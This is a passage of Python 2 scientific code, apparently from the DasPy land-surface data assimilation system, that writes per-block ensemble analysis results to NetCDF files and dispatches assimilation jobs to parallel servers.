Start_Month, maxpft, Feedback_Assim, Dim_Soil_Par, Soil_Par_Sens, Dim_Veg_Par, Veg_Par_Sens, Dim_PFT_Par, PFT_Par_Sens, Dim_Hard_Par, Hard_Par_Sens, Soil_Par_Sens_Dim, Veg_Par_Sens_Dim, PFT_Par_Sens_Dim, Hard_Par_Sens_Dim, Parameter_Soil_Space_Ensemble_SubBlock, Parameter_Soil_Space_parm_infl_SubBlock,
Parameter_Veg_Space_Ensemble_SubBlock, Parameter_Veg_Space_parm_infl_SubBlock, Parameter_PFT_Space_Ensemble_SubBlock, Parameter_PFT_Space_parm_infl_SubBlock, Parameter_Hard_Space_Ensemble_SubBlock, Parameter_Hard_Space_parm_infl_SubBlock, Parameter_Min_Max,
Soil_Layer_Thickness_Ratio, Soil_Texture_Layer_Opt_Num, Soil_Sand_Clay_Sum, Parameter_Range_Soil, Parameter_Range_Veg, Parameter_Range_PFT, Parameter_Range_Hard, Parameter_Regularization,
Par_Soil_Uniform_STD, Par_Veg_Uniform_STD, Par_PFT_Uniform_STD, Par_Hard_Uniform_STD,
Saturation_SSat_SubBlock, Saturation_SRes_SubBlock, Saturation_N_SubBlock, Saturation_Alpha_SubBlock, DateString_Plot, *vartuple)
else:
# No valid observations (or empty state): the "analysis" is just the
# ensemble mean of the propagated state, members passed through.
Analysis_Grid_SubBlock = numpy.mean(Prop_Grid_Array_SubBlock[:, :, :],axis=0)
for Ens_Index in range(Ensemble_Number):
Analysis_Grid_Array_SubBlock[Ens_Index,:,:] = Prop_Grid_Array_SubBlock[Ens_Index, :, :]
# if SensorType != "AMSR_E":
# Observation_Matrix[(Sub_Block_Index_Row*Row_Numbers_SubBlock):((Sub_Block_Index_Row+1)*Row_Numbers_SubBlock),(Sub_Block_Index_Col*Col_Numbers_SubBlock):((Sub_Block_Index_Col+1)*Col_Numbers_SubBlock)] = Observation_Matrix_SubBlock
# else:
# Observation_Matrix = Observation_Matrix_SubBlock
#Observation_Matrix = Observation_Matrix_SubBlock
# Compose the Full Analysis Grid
if Def_Print:
end = time.time()
print 'Time of Block',Block_Index,'is: ', (end - start), 'Seconds'
# Shrink the observation-box indices so that the halo (overlap of width
# Observation_Box / Sub_Block_*_Start) added around this sub-block is
# excluded when the analysis is written back to the full grid.
if Def_Print:
print "Before",Observation_Box_Row_Index_Start,Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start,Observation_Box_Col_Index_End
if Observation_Box_Row_Index_Start == 0 and Sub_Block_Row_Start > 0:
Observation_Box_Row_Index_Start = Sub_Block_Row_Start
elif Observation_Box_Row_Index_Start > 0:
Observation_Box_Row_Index_Start = Observation_Box
if Observation_Box_Row_Index_End < Row_Numbers:
Observation_Box_Row_Index_End = Observation_NLats_SubBlock - Observation_Box
elif Observation_Box_Row_Index_End == Row_Numbers and Observation_NLats_SubBlock <= Row_Numbers:
Observation_Box_Row_Index_End = Observation_Box_Row_Index_Start + Row_Numbers_SubBlock
if Observation_Box_Col_Index_Start == 0 and Sub_Block_Col_Start > 0:
Observation_Box_Col_Index_Start = Sub_Block_Col_Start
elif Observation_Box_Col_Index_Start > 0:
Observation_Box_Col_Index_Start = Observation_Box
if Observation_Box_Col_Index_End < Col_Numbers:
Observation_Box_Col_Index_End = Observation_NLons_SubBlock - Observation_Box
elif Observation_Box_Col_Index_End == Col_Numbers and Observation_NLons_SubBlock <= Col_Numbers:
Observation_Box_Col_Index_End = Observation_Box_Col_Index_Start + Col_Numbers_SubBlock
if Def_Print:
print "After",Observation_Box_Row_Index_Start,Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start,Observation_Box_Col_Index_End
# Look up this block's patch extents (row/col span within the full domain)
# and derive the patch dimensions used for the output NetCDF below.
Sub_Block_Row_Start = Sub_Block_Row_Start_Array[Block_Index]
Sub_Block_Row_End = Sub_Block_Row_End_Array[Block_Index]
Sub_Block_Col_Start = Sub_Block_Col_Start_Array[Block_Index]
Sub_Block_Col_End = Sub_Block_Col_End_Array[Block_Index]
Row_Numbers_SubBlock_Patch = Sub_Block_Row_End - Sub_Block_Row_Start
Col_Numbers_SubBlock_Patch = Sub_Block_Col_End - Sub_Block_Col_Start
if Def_Print:
print "Row_Numbers_SubBlock_Patch,Col_Numbers_SubBlock_Patch",Row_Numbers_SubBlock_Patch,Col_Numbers_SubBlock_Patch
# Record the State Analysis
NC_FileName_Out_Block_Assim = DAS_Output_Path+"Analysis/"+Region_Name+"/Block_Assim_"+str(Block_Index+1)+".nc"
if os.path.exists(NC_FileName_Out_Block_Assim):
os.remove(NC_FileName_Out_Block_Assim)
if Def_Print:
print 'Write NetCDF File:',NC_FileName_Out_Block_Assim
NC_File_Out_Block_Assim = netCDF4.Dataset(NC_FileName_Out_Block_Assim, 'w', diskless=True, persist=True, format='NETCDF4')
# Dim the dimensions of NetCDF
NC_File_Out_Block_Assim.createDimension('lon', Col_Numbers_SubBlock_Patch)
NC_File_Out_Block_Assim.createDimension('lat', Row_Numbers_SubBlock_Patch)
NC_File_Out_Block_Assim.createDimension('Soil_Layer_Num', Soil_Layer_Num)
NC_File_Out_Block_Assim.createDimension('ParFlow_Layer_Num', ParFlow_Layer_Num)
NC_File_Out_Block_Assim.createDimension('Ensemble_Number', Ensemble_Number)
NC_File_Out_Block_Assim.createDimension('Dim_CLM_State', Dim_CLM_State)
NC_File_Out_Block_Assim.createDimension('Dim_Soil_Par', Dim_Soil_Par)
NC_File_Out_Block_Assim.createDimension('Dim_Veg_Par', Dim_Veg_Par)
NC_File_Out_Block_Assim.createDimension('Dim_PFT_Par', Dim_PFT_Par)
NC_File_Out_Block_Assim.createDimension('Dim_Hard_Par', Dim_Hard_Par)
NC_File_Out_Block_Assim.createDimension('maxpft', maxpft)
NC_File_Out_Block_Assim.createDimension('Dim_Observation_Quantity', Dim_Observation_Quantity)
NC_File_Out_Block_Assim.createVariable('Prop_Grid_Array_Sys','f4',('Ensemble_Number','Dim_CLM_State','lat','lon',),zlib=True)
NC_File_Out_Block_Assim.createVariable('Prop_Grid_Array_H_Trans','f4',('Ensemble_Number','Dim_CLM_State','lat','lon',),zlib=True)
if Parameter_Optimization_Flag:
if Soil_Par_Sens_Dim >= 1:
NC_File_Out_Block_Assim.createVariable('Parameter_Soil_Space_Ensemble','f4',('Ensemble_Number','Dim_Soil_Par','lat','lon',),zlib=True)
NC_File_Out_Block_Assim.createVariable('Parameter_Soil_Space_parm_infl','f4',('Dim_Soil_Par','lat','lon',),zlib=True)
if PFT_Par_Sens_Dim >= 1:
NC_File_Out_Block_Assim.createVariable('Parameter_PFT_Space_Ensemble','f4',('Ensemble_Number','Dim_PFT_Par','lat','lon',),zlib=True)
NC_File_Out_Block_Assim.createVariable('Parameter_PFT_Space_parm_infl','f4',('Dim_PFT_Par','lat','lon',),zlib=True)
NC_File_Out_Block_Assim.createVariable('Analysis_Grid','f4',('lat','lon',),zlib=True)
NC_File_Out_Block_Assim.createVariable('Localization_Map_Mask','f4',('lat','lon',),zlib=True)
NC_File_Out_Block_Assim.createVariable('Analysis_Grid_Array','f4',('Ensemble_Number','Dim_CLM_State','lat','lon',),zlib=True)
NC_File_Out_Block_Assim.createVariable('Innovation_State','f4',('Ensemble_Number','Dim_CLM_State','lat','lon',),zlib=True)
NC_File_Out_Block_Assim.createVariable('Increments_State','f4',('Ensemble_Number','Dim_CLM_State','lat','lon',),zlib=True)
NC_File_Out_Block_Assim.createVariable('CLM_Soil_Moisture_Ensemble_Mat','f4',('Soil_Layer_Num','lat','lon','Ensemble_Number',),zlib=True)
NC_File_Out_Block_Assim.createVariable('CLM_Soil_Temperature_Ensemble_Mat','f4',('Soil_Layer_Num','lat','lon','Ensemble_Number',),zlib=True)
#NC_File_Out_Block_Assim.createVariable('CLM_Soil_Ice_Ensemble_Mat','f4',('Soil_Layer_Num','lat','lon','Ensemble_Number',),zlib=True)
NC_File_Out_Block_Assim.createVariable('CLM_Vegetation_Temperature_Ensemble_Mat','f4',('lat','lon','Ensemble_Number',),zlib=True)
NC_File_Out_Block_Assim.createVariable('CLM_Ground_Temperature_Ensemble_Mat','f4',('lat','lon','Ensemble_Number',),zlib=True)
#NC_File_Out_Block_Assim.createVariable('CLM_2m_Air_Temperature_Ensemble_Mat','f4',('lat','lon','Ensemble_Number',),zlib=True)
#NC_File_Out_Block_Assim.createVariable('CLM_Snow_Depth_Ensemble_Mat','f4',('lat','lon','Ensemble_Number',),zlib=True)
#NC_File_Out_Block_Assim.createVariable('CLM_Snow_Water_Ensemble_Mat','f4',('lat','lon','Ensemble_Number',),zlib=True)
#NC_File_Out_Block_Assim.createVariable('CLM_ROOTFR_Ensemble_Mat','f4',('Soil_Layer_Num','lat','lon','Ensemble_Number',),zlib=True)
NC_File_Out_Block_Assim.createVariable('Prop_Grid_Array_Sys_parm_infl','f4',('Dim_CLM_State','lat','lon',),zlib=True)
NC_File_Out_Block_Assim.createVariable('CLM_Soil_Moisture_parm_infl','f4',('Soil_Layer_Num','lat','lon',),zlib=True)
NC_File_Out_Block_Assim.createVariable('CLM_Soil_Temperature_parm_infl','f4',('Soil_Layer_Num','lat','lon',),zlib=True)
#NC_File_Out_Block_Assim.createVariable('CLM_Soil_Ice_parm_infl','f4',('Soil_Layer_Num','lat','lon',),zlib=True)
NC_File_Out_Block_Assim.createVariable('CLM_Vegetation_Temperature_parm_infl','f4',('lat','lon',),zlib=True)
NC_File_Out_Block_Assim.createVariable('CLM_Ground_Temperature_parm_infl','f4',('lat','lon',),zlib=True)
NC_File_Out_Block_Assim.createVariable('CLM_Surface_Temperature_parm_infl','f4',('lat','lon',),zlib=True)
NC_File_Out_Block_Assim.createVariable('Observation','f4',('Dim_CLM_State','lat','lon',),zlib=True)
if Def_Print:
print "Row_Numbers_SubBlock_Patch,Col_Numbers_SubBlock_Patch",Row_Numbers_SubBlock_Patch,Col_Numbers_SubBlock_Patch
if Def_Print:
print 'Write NetCDF File:',NC_FileName_Out_Block_Assim
if Parameter_Optimization_Flag:
if Soil_Par_Sens_Dim >= 1:
NC_File_Out_Block_Assim.variables['Parameter_Soil_Space_Ensemble'][:, :, :, :] = Parameter_Soil_Space_Ensemble_SubBlock[:, :, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
NC_File_Out_Block_Assim.variables['Parameter_Soil_Space_parm_infl'][:, :, :] = Parameter_Soil_Space_parm_infl_SubBlock[:, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
if PFT_Par_Sens_Dim >= 1:
NC_File_Out_Block_Assim.variables['Parameter_PFT_Space_Ensemble'][:, :, :, :] = Parameter_PFT_Space_Ensemble_SubBlock[:, :, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
NC_File_Out_Block_Assim.variables['Parameter_PFT_Space_parm_infl'][:, :, :] = Parameter_PFT_Space_parm_infl_SubBlock[:,Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
NC_File_Out_Block_Assim.variables['Prop_Grid_Array_Sys'][:, Prop_Grid_Array_Sys_Index, :, :] = Prop_Grid_Array_SubBlock[:,Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
NC_File_Out_Block_Assim.variables['Prop_Grid_Array_H_Trans'][:, Prop_Grid_Array_Sys_Index, :, :] = Prop_Grid_Array_H_Trans_SubBlock[:,Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
NC_File_Out_Block_Assim.variables['Innovation_State'][:,Prop_Grid_Array_Sys_Index,:,:] = Innovation_State_SubBlock[:,Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
NC_File_Out_Block_Assim.variables['Increments_State'][:,Prop_Grid_Array_Sys_Index,:,:] = Increments_State_SubBlock[:,Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
NC_File_Out_Block_Assim.variables['Analysis_Grid'][:, :] = Analysis_Grid_SubBlock[Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
NC_File_Out_Block_Assim.variables['Localization_Map_Mask'][:, :] = Localization_Map_Mask_SubBlock[Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
NC_File_Out_Block_Assim.variables['Analysis_Grid_Array'][:, Prop_Grid_Array_Sys_Index, :, :] = Analysis_Grid_Array_SubBlock[:,Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
NC_File_Out_Block_Assim.variables['CLM_Soil_Moisture_Ensemble_Mat'][:, :, :, :] = CLM_Soil_Moisture_Ensemble_Mat_SubBlock[:, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End, :]
NC_File_Out_Block_Assim.variables['CLM_Soil_Temperature_Ensemble_Mat'][:, :, :, :] = CLM_Soil_Temperature_Ensemble_Mat_SubBlock[:, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End, :]
NC_File_Out_Block_Assim.variables['CLM_Vegetation_Temperature_Ensemble_Mat'][:, :, :] = CLM_Vegetation_Temperature_Ensemble_Mat_SubBlock[Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End, :]
NC_File_Out_Block_Assim.variables['CLM_Ground_Temperature_Ensemble_Mat'][:, :, :] = CLM_Ground_Temperature_Ensemble_Mat_SubBlock[Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End, :]
NC_File_Out_Block_Assim.variables['Prop_Grid_Array_Sys_parm_infl'][Prop_Grid_Array_Sys_Index,:, :] = Prop_Grid_Array_Sys_parm_infl_SubBlock[Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
NC_File_Out_Block_Assim.variables['CLM_Soil_Moisture_parm_infl'][:, :, :] = CLM_Soil_Moisture_parm_infl_SubBlock[:, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
NC_File_Out_Block_Assim.variables['CLM_Soil_Temperature_parm_infl'][:, :, :] = CLM_Soil_Temperature_parm_infl_SubBlock[:, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
NC_File_Out_Block_Assim.variables['CLM_Vegetation_Temperature_parm_infl'][:, :] = CLM_Vegetation_Temperature_parm_infl_SubBlock[Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
NC_File_Out_Block_Assim.variables['CLM_Ground_Temperature_parm_infl'][:, :] = CLM_Ground_Temperature_parm_infl_SubBlock[Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
NC_File_Out_Block_Assim.variables['CLM_Surface_Temperature_parm_infl'][:, :] = CLM_Surface_Temperature_parm_infl_SubBlock[Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
NC_File_Out_Block_Assim.variables['Observation'][Prop_Grid_Array_Sys_Index,:,:] = Observation_Matrix_SubBlock[Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
NC_File_Out_Block_Assim.sync()
NC_File_Out_Block_Assim.close()
del Observation_Variance_SubBlock,Observation_Longitude_SubBlock,Observation_Latitude_SubBlock,Observation_Matrix_SubBlock
del E0_SysModel_SubBlock,E0_ObsModel_SubBlock, parm_infl
del Parameter_Soil_Space_Ensemble_SubBlock, Parameter_Soil_Space_parm_infl_SubBlock, Parameter_Hard_Space_Ensemble_SubBlock, Parameter_Hard_Space_parm_infl_SubBlock, Parameter_Veg_Space_Ensemble_SubBlock
del Parameter_Veg_Space_parm_infl_SubBlock, Parameter_PFT_Space_Ensemble_SubBlock, Parameter_PFT_Space_parm_infl_SubBlock
del Prop_Grid_Array_SubBlock, Prop_Grid_Array_H_Trans_SubBlock, Model_State_SubBlock, Model_Variance_SubBlock, Mask_SubBlock, Mask_Index_SubBlock, Land_Mask_Data_SubBlock
del Teta_Residual_SubBlock, Teta_Saturated_SubBlock, Teta_Field_Capacity_SubBlock, Teta_Wilting_Point_SubBlock, Analysis_Grid_SubBlock, Localization_Map_Mask_SubBlock, Analysis_Grid_Array_SubBlock
del Innovation_State_SubBlock, Increments_State_SubBlock, Soil_Layer_Thickness_Ratio
del CLM_Soil_Moisture_Ensemble_Mat_SubBlock, CLM_Soil_Temperature_Ensemble_Mat_SubBlock, CLM_Vegetation_Temperature_Ensemble_Mat_SubBlock
del CLM_Ground_Temperature_Ensemble_Mat_SubBlock, CLM_Soil_Moisture_parm_infl_SubBlock, CLM_Soil_Temperature_parm_infl_SubBlock
del Prop_Grid_Array_Sys_parm_infl_SubBlock, CLM_Vegetation_Temperature_parm_infl_SubBlock, CLM_Ground_Temperature_parm_infl_SubBlock, CLM_Surface_Temperature_parm_infl_SubBlock, CLM_Latent_Heat_parm_infl_SubBlock
del Prop_Grid_Array_Sys_parm_infl, CLM_Soil_Moisture_parm_infl, CLM_Soil_Temperature_parm_infl, CLM_Surface_Temperature_parm_infl, CLM_Ground_Temperature_parm_infl, CLM_Vegetation_Temperature_parm_infl,CLM_Latent_Heat_parm_infl, CLM_Sensible_Heat_parm_infl
del CLM_Soil_Moisture_Ensemble, CLM_Soil_Temperature_Ensemble, CLM_Surface_Temperature_Ensemble, CLM_Ground_Temperature_Ensemble, CLM_Vegetation_Temperature_Ensemble
del Mask_Sub, Mask_Index_Sub, Mask_Index_Sub_NC, Model_Variance, Observation_Variance, Observation_Longitude, Observation_Latitude, Observation_Matrix,
del numexpr_a,numexpr_b,numexpr_c
CLM_Soil_Moisture_Col = []
del CLM_Soil_Moisture_Ensemble_Mat_Bias_SubBlock, CLM_Soil_Temperature_Ensemble_Mat_Bias_SubBlock, CLM_Vegetation_Temperature_Ensemble_Mat_Bias_SubBlock
del CLM_Ground_Temperature_Ensemble_Mat_Bias_SubBlock, CLM_Soil_Moisture_parm_infl_Bias_SubBlock, CLM_Soil_Temperature_parm_infl_Bias_SubBlock
del CLM_Vegetation_Temperature_parm_infl_Bias_SubBlock, CLM_Ground_Temperature_parm_infl_Bias_SubBlock, CLM_Surface_Temperature_parm_infl_Bias_SubBlock
del CLM_Soil_Moisture_parm_infl_Bias, CLM_Soil_Temperature_parm_infl_Bias, CLM_Surface_Temperature_parm_infl_Bias, CLM_Ground_Temperature_parm_infl_Bias, CLM_Vegetation_Temperature_parm_infl_Bias,
del CLM_Soil_Moisture_Ensemble_Bias, CLM_Soil_Temperature_Ensemble_Bias, CLM_Surface_Temperature_Ensemble_Bias, CLM_Ground_Temperature_Ensemble_Bias, CLM_Vegetation_Temperature_Ensemble_Bias
del Prop_Grid_Array_Bias, Observation_Bias, Prop_Grid_Array_Bias_SubBlock, Observation_Bias_SubBlock, Prop_Grid_Array_Sys_parm_infl_Bias_SubBlock, Observation_parm_infl_Bias_SubBlock
del Prop_Grid_Array_Sys_parm_infl_Bias, Observation_parm_infl_Bias
gc.collect()
del gc.garbage[:]
return
# ****************************************************************** Assimilation ******************************************************************
def Assimilation_Update(mpi4py_comm, mpi4py_rank, mpi4py_name, Model_Driver, NSLOTS, finidat_initial_Array, Def_ParFor, Def_Region, Def_Initial, Irrig_Scheduling, Irrigation_Hours, Def_First_Run, Def_Print, Region_Name, Run_Dir_Home, Model_Path, CLM_Flag, Def_PP, job_server_node_array, active_nodes_server,
Start_Year, Start_Month, Start_Day, Stop_Year, Stop_Month, Stop_Day, Stop_Hour, UTC_Zone, Datetime_Start, Datetime_Start_Init, Datetime_Stop, Datetime_Stop_Init, Datetime_End, Datetime_Initial, Weather_Forecast_Days, Density_of_liquid_water, Density_of_ice, Freezing_temperature_of_fresh_water, N0, nlyr,
DAS_Data_Path, DAS_Depends_Path, DasPy_Path, Def_Multiresolution, Def_ReBEL, Def_Localization, Num_Local_Obs, eps, msw_infl, Plot_Analysis, Def_Figure_Output, DateString_Plot,
Def_Write_Initial,DA_Flag, Write_DA_File_Flag, Mask, Mask_Index, COSMOS_Circle_Array, COSMOS_Circle_Index_Array, COSMOS_Circle_Num_Array, Call_Gstat_Flag, mksrf_edgee, mksrf_edges, mksrf_edgew, mksrf_edgen, Station_XY_Index, Station_XY, Observation_Box,
Variable_Assimilation_Flag, Row_Numbers, Col_Numbers, Row_Numbers_String, Col_Numbers_String, Model_Variance, Initial_Perturbation_SM_Flag, Initial_Perturbation_ST_Flag, Normal_Score_Trans, PDAF_Assim_Framework, PDAF_Filter_Type, PP_Servers_Per_Node, Def_CESM_Multi_Instance, PP_Port,
Z_Resolution, MODEL_X_Left, MODEL_X_Right, MODEL_Y_Lower, MODEL_Y_Upper, Proj_String, MODEL_CEA_X, MODEL_CEA_Y, Hydraulic_File_Name, Assim_Algorithm_Name, Low_Ratio_Par, High_Ratio_Par, Post_Inflation_Alpha_State, irrig_nsteps_per_day, PFT_Num,
Sub_Block_Ratio_Row, Sub_Block_Ratio_Col, Sub_Block_Index_Row_Mat_Vector, Sub_Block_Index_Col_Mat_Vector, Row_Offset, Col_Offset, fpftcon_name, Crop_Sum,
Model_State_Inflation_Range, Model_State_Inflation_Range_STD, Model_Bias_Range, Observation_Bias_Range, Model_Bias_Range_STD, Observation_Bias_Range_STD, Model_Bias_STD, Observation_Bias_STD, Dim_Observation_Quantity,
Row_Numbers_SubBlock_Array, Col_Numbers_SubBlock_Array, Sub_Block_Row_Start_Array, Sub_Block_Row_End_Array, Sub_Block_Col_Start_Array, Sub_Block_Col_End_Array, finidat_name,
Ensemble_Number, Ensemble_Number_Predict, Soil_Layer_Num, Snow_Layer_Num, maxpft, Forcing_File_Path, dtime, Observation_Path, Dim_CLM_State, Dim_Obs_Type, CLM_NA, NAvalue, Variable_List, ntasks_CLM, rootpe_CLM, nthreads_CLM, omp_get_num_procs_ParFor,
Grid_Resolution_CEA, Grid_Resolution_GEO, SensorQuantity_Sub, SensorType_Sub, SensorVariable_Sub, SensorResolution_Sub, Variable_ID_Sub, QC_ID_Sub,Analysis_Variable_Name, Soil_Layer_Index_DA,
Observation_Matrix, Observation_Variance, Observation_Latitude, Observation_Longitude, Observation_NLons, Observation_NLats, Observation_X_Left, Observation_X_Right, Observation_Y_Lower, Observation_Y_Upper, Observation_Corelation_Par,
octave,r,Def_CDF_Matching, numrad, cols1d_ixy, cols1d_jxy, pfts1d_ixy, pfts1d_jxy, cols1d_ityplun, pfts1d_ityplun, column_len, pft_len, pfts1d_itypveg, pfts1d_ci,
diskless_flag, persist_flag, Forcing_File_Path_Home, Forcing_File_Path_Array, history_file_name, Constant_File_Name, Run_Dir_Array, Feedback_Assim,
Dim_Soil_Par, Dim_Veg_Par, Dim_PFT_Par, Dim_Hard_Par, Soil_Texture_Layer_Opt_Num, Soil_Sand_Clay_Sum, Parameter_Range_Soil, Parameter_Range_Veg, Parameter_Range_PFT, Parameter_Range_Hard, Parameter_Regularization, Par_Soil_Uniform_STD_Sub, Par_Veg_Uniform_STD_Sub, Par_PFT_Uniform_STD_Sub, Par_Hard_Uniform_STD_Sub, \
Analysis_Grid, Localization_Map_Mask, ObsModel_Mat, ObsModel_Variance_Mat, Prop_Grid_Array_Sys_Index, Observation_Matrix_Index, Mask_Sub, Mask_Index_Sub,
SensorQuantity_Index, Soil_Par_Sens_Dim, Veg_Par_Sens_Dim, PFT_Par_Sens_Dim, Hard_Par_Sens_Dim, ParFlow_Layer_Num,
NC_FileName_Assimilation_2_Constant, NC_FileName_Assimilation_2_Diagnostic, NC_FileName_Assimilation_2_Initial, NC_FileName_Assimilation_2_Bias, NC_FileName_Assimilation_2_Parameter, \
NC_FileName_Assimilation_2_Initial_Copy, NC_FileName_Assimilation_2_Bias_Copy, NC_FileName_Assimilation_2_Bias_Monthly, NC_FileName_Assimilation_2_Bias_Monthly_Copy, NC_FileName_Assimilation_2_Parameter_Monthly, NC_FileName_Assimilation_2_Parameter_Monthly_Copy,
NC_FileName_Parameter_Space_Single, DAS_Output_Path, COSMIC_Py, window, memory_profiler, COSMIC, finidat_name_string, Observation_Time_File_Path):
##################################################################################################
if True:
Parameter_Optimization_Flag = 0
Bias_Estimation_Option_Model_Assim = numpy.asarray([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]) # Model Bias
Bias_Estimation_Option_Obs_Assim = numpy.asarray([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]) # Observation Bias
Soil_Par_Sens = []
Veg_Par_Sens = []
PFT_Par_Sens = []
Hard_Par_Sens = []
if Def_PP and (not PDAF_Assim_Framework == 2) and (Sub_Block_Ratio_Row*Sub_Block_Ratio_Col) > 1 and len(active_nodes_server) > 1:
print "********************************************** Using PP to Accelerate Block_Assim"
Job_Num_Per_Node = int(numpy.ceil(float(Sub_Block_Ratio_Row*Sub_Block_Ratio_Col) / len(active_nodes_server)))
if Job_Num_Per_Node == 0:
Job_Num_Per_Node = 1
job_server_node_results = []
job_server_node_results_wise = [[] for i in range(len(active_nodes_server))]
print "The following submits",Job_Num_Per_Node,"jobs on each node and then retrieves the results"
Block_Index = 0
Node_Status = numpy.zeros(len(active_nodes_server),dtype=numpy.bool)
Node_Status[:] = True
while Block_Index < Sub_Block_Ratio_Row*Sub_Block_Ratio_Col:
if numpy.size(numpy.where(Node_Status==True)) > 0:
Node_Index = numpy.where(Node_Status==True)[0][0]
print "***********************Node_Index",Node_Index,"Block_Index",Block_Index,"is submitted!"
job_server_node = job_server_node_array[numpy.min([Node_Index*len(job_server_node_array)/len(active_nodes_server),len(job_server_node_array)-1])]
job_server_node_results.append(job_server_node.submit(Block_Assim, args=(Block_Index, Model_Driver, Sub_Block_Index_Row_Mat_Vector, Sub_Block_Index_Col_Mat_Vector, Row_Numbers, Col_Numbers, Sub_Block_Ratio_Row, Sub_Block_Ratio_Col, Row_Offset, Col_Offset,
Row_Numbers_SubBlock_Array, Col_Numbers_SubBlock_Array, Sub_Block_Row_Start_Array, Sub_Block_Row_End_Array, Sub_Block_Col_Start_Array, Sub_Block_Col_End_Array,
Start_Month, Stop_Month, Stop_Day, Stop_Hour, UTC_Zone, MODEL_X_Left, MODEL_X_Right, MODEL_Y_Lower, MODEL_Y_Upper, Ensemble_Number, Prop_Grid_Array_Sys_Index,
Dim_Observation_Quantity, SensorQuantity_Index, Observation_Box, Model_State_Inflation_Range, Model_State_Inflation_Range_STD, Model_Bias_Range, Observation_Bias_Range, Model_Bias_Range_STD, Observation_Bias_Range_STD, Model_Bias_STD, Observation_Bias_STD,
Variable_List, Observation_Matrix_Index, Soil_Layer_Num, ParFlow_Layer_Num, SensorVariable_Sub, SensorType_Sub, SensorQuantity_Sub, SensorResolution_Sub,
Variable_Assimilation_Flag, Soil_Layer_Index_DA, Feedback_Assim, Parameter_Optimization_Flag, Soil_Par_Sens, Veg_Par_Sens, PFT_Par_Sens, Hard_Par_Sens, Dim_CLM_State, maxpft, Normal_Score_Trans, PDAF_Assim_Framework, PDAF_Filter_Type,
Def_First_Run, Def_Print, Def_PP, Def_Multiresolution, Def_ReBEL, Def_Localization, Num_Local_Obs[Prop_Grid_Array_Sys_Index], eps, msw_infl, Post_Inflation_Alpha_State, Def_ParFor, Ensemble_Number_Predict,
Call_Gstat_Flag, diskless_flag, persist_flag, Assim_Algorithm_Name, Proj_String, Z_Resolution, Observation_X_Left, Observation_X_Right, Observation_Y_Lower, Observation_Y_Upper,
Grid_Resolution_CEA, Write_DA_File_Flag, Datetime_Start, Datetime_Stop, Datetime_Stop_Init, Datetime_Initial, Region_Name, NSLOTS,
Observation_Corelation_Par, Bias_Estimation_Option_Model_Assim, Bias_Estimation_Option_Obs_Assim, Low_Ratio_Par, High_Ratio_Par,
Dim_Soil_Par, Dim_Veg_Par, Dim_PFT_Par, Dim_Hard_Par, Soil_Par_Sens_Dim, Veg_Par_Sens_Dim, PFT_Par_Sens_Dim, Hard_Par_Sens_Dim, Soil_Texture_Layer_Opt_Num, Soil_Sand_Clay_Sum, Parameter_Range_Soil, Parameter_Range_Veg, Parameter_Range_PFT, Parameter_Range_Hard, Parameter_Regularization, Par_Soil_Uniform_STD_Sub, Par_Veg_Uniform_STD_Sub, Par_PFT_Uniform_STD_Sub, Par_Hard_Uniform_STD_Sub, DateString_Plot,
DAS_Depends_Path, DasPy_Path, CLM_NA, NAvalue, omp_get_num_procs_ParFor, Def_CDF_Matching, Plot_Analysis, NC_FileName_Assimilation_2_Constant, NC_FileName_Assimilation_2_Diagnostic, NC_FileName_Assimilation_2_Initial,
NC_FileName_Assimilation_2_Bias, NC_FileName_Assimilation_2_Parameter, NC_FileName_Parameter_Space_Single, DAS_Output_Path),
depfuncs=(CLM_Assim_Common, Check_Outliers, ParFor_Fusion, ParFor_H_Operator, ParFor_Texture_Check, ParFor_Check_Outliers, ParFor_Check_Outliers_NA,),
